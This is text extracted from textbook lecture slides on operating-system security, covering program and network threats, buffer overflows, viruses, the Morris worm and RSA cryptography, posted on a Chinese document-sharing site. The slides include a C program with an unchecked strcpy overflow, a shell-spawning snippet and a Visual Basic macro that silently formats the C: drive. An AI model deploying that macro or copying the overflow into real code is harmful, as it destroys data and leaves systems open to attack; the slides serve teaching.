operatingsystem《操作系统》ch15-security.ppt
《operatingsystem《操作系统》ch15-security.ppt》由会员分享,可在线阅读,更多相关《operatingsystem《操作系统》ch15-security.ppt(43页珍藏版)》请在三一办公上搜索。
1、Chapter 15:Security,Chapter 15:Security,The Security ProblemProgram ThreatsSystem and Network ThreatsCryptography as a Security ToolUser AuthenticationImplementing Security DefensesFirewalling to Protect Systems and NetworksComputer-Security ClassificationsAn Example:Windows XP,Objectives,To discuss
2、 security threats and attacksTo explain the fundamentals of encryption,authentication,and hashingTo examine the uses of cryptography in computingTo describe the various countermeasures to security attacks,The Security Problem,Security must consider external environment of the system,and protect the
3、system resourcesIntruders(crackers)attempt to breach securityThreat is potential security violationAttack is attempt to breach securityAttack can be accidental or maliciousEasier to protect against accidental than malicious misuse,Security Violations,CategoriesBreach of confidentialityBreach of inte
4、grityBreach of availabilityTheft of serviceDenial of serviceMethodsMasquerading(breach authentication)Replay attackMessage modificationMan-in-the-middle attackSession hijacking,Standard Security Attacks,Security Measure Levels,Security must occur at four levels to be effective:PhysicalHumanAvoid soc
5、ial engineering,phishing,dumpster divingOperating SystemNetworkSecurity is as week as the weakest chain,Program Threats,Trojan HorseCode segment that misuses its environmentExploits mechanisms for allowing programs written by users to be executed by other usersSpyware,pop-up browser windows,covert c
6、hannelsTrap DoorSpecific user identifier or password that circumvents normal security proceduresCould be included in a compilerLogic BombProgram that initiates a security incident under certain circumstancesStack and Buffer OverflowExploits a bug in a program(overflow either the stack or memory buff
7、ers),C Program with Buffer-overflow Condition,#include#define BUFFER SIZE 256int main(int argc,char*argv)char bufferBUFFER SIZE;if(argc 2)return-1;else strcpy(buffer,argv1);return 0;,Layout of Typical Stack Frame,Modified Shell Code,#include int main(int argc,char*argv)execvp(binsh,bin sh,NULL);retu
8、rn 0;,Hypothetical Stack Frame,Before attack,After attack,Program Threats(Cont.),VirusesCode fragment embedded in legitimate programVery specific to CPU architecture,operating system,applicationsUsually borne via email or as a macroVisual Basic Macro to reformat hard driveSub AutoOpen()Dim oFSSet oF
9、S=CreateObject(Scripting.FileSystemObject)vs=Shell(c:/k format c:,vbHide)End Sub,Program Threats(Cont.),Virus dropper inserts virus onto the systemMany categories of viruses,literally many thousands of virusesFileBootMacroSource codePolymorphicEncryptedStealthTunnelingMultipartiteArmored,A Boot-sect
10、or Computer Virus,System and Network Threats,Worms use spawn mechanism;standalone programInternet wormExploited UNIX networking features(remote access)and bugs in finger and sendmail programsGrappling hook program uploaded main worm programPort scanningAutomated attempt to connect to a range of port
11、s on one or a range of IP addressesDenial of ServiceOverload the targeted computer preventing it from doing any useful workDistributed denial-of-service(DDOS)come from multiple sites at once,The Morris Internet Worm,Cryptography as a Security Tool,Broadest security tool availableSource and destinati
12、on of messages cannot be trusted without cryptographyMeans to constrain potential senders(sources)and/or receivers(destinations)of messagesBased on secrets(keys),Secure Communication over Insecure Medium,Encryption,Encryption algorithm consists ofSet of K keysSet of M MessagesSet of C ciphertexts(en
13、crypted messages)A function E:K(MC).That is,for each k K,E(k)is a function for generating ciphertexts from messages.Both E and E(k)for any k should be efficiently computable functions.A function D:K(C M).That is,for each k K,D(k)is a function for generating messages from ciphertexts.Both D and D(k)f
14、or any k should be efficiently computable functions.An encryption algorithm must provide this essential property:Given a ciphertext c C,a computer can compute m such that E(k)(m)=c only if it possesses D(k).Thus,a computer holding D(k)can decrypt ciphertexts to the plaintexts used to produce them,bu
15、t a computer not holding D(k)cannot decrypt ciphertexts.Since ciphertexts are generally exposed(for example,sent on the network),it is important that it be infeasible to derive D(k)from the ciphertexts,Symmetric Encryption,Same key used to encrypt and decryptE(k)can be derived from D(k),and vice ver
16、saDES is most commonly used symmetric block-encryption algorithm(created by US Govt)Encrypts a block of data at a timeTriple-DES considered more secureAdvanced Encryption Standard(AES),twofish up and comingRC4 is most common symmetric stream cipher,but known to have vulnerabilitiesEncrypts/decrypts
17、a stream of bytes(i.e wireless transmission)Key is a input to psuedo-random-bit generatorGenerates an infinite keystream,Asymmetric Encryption,Public-key encryption based on each user having two keys:public key published key used to encrypt dataprivate key key known only to individual user used to d
18、ecrypt dataMust be an encryption scheme that can be made public without making it easy to figure out the decryption schemeMost common is RSA block cipherEfficient algorithm for testing whether or not a number is primeNo efficient algorithm is know for finding the prime factors of a number,Asymmetric
19、 Encryption(Cont.),Formally,it is computationally infeasible to derive D(kd,N)from E(ke,N),and so E(ke,N)need not be kept secret and can be widely disseminatedE(ke,N)(or just ke)is the public keyD(kd,N)(or just kd)is the private keyN is the product of two large,randomly chosen prime numbers p and q(
20、for example,p and q are 512 bits each)Encryption algorithm is E(ke,N)(m)=mke mod N,where ke satisfies kekd mod(p1)(q 1)=1The decryption algorithm is then D(kd,N)(c)=ckd mod N,Asymmetric Encryption Example,For example.make p=7and q=13We then calculate N=713=91 and(p1)(q1)=72We next select ke relative
21、ly prime to 72 and 72,yielding 5Finally,we calculate kd such that kekd mod 72=1,yielding 29We how have our keysPublic key,ke,N=5,91Private key,kd,N=29,91 Encrypting the message 69 with the public key results in the cyphertext 62Cyphertext can be decoded with the private keyPublic key can be distribu
22、ted in cleartext to anyone who wants to communicate with holder of public key,Encryption and Decryption using RSA Asymmetric Cryptography,Cryptography(Cont.),Note symmetric cryptography based on transformations,asymmetric based on mathematical functionsAsymmetric much more compute intensiveTypically
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 操作系统 operatingsystem ch15 security
链接地址:https://www.31ppt.com/p-6513290.html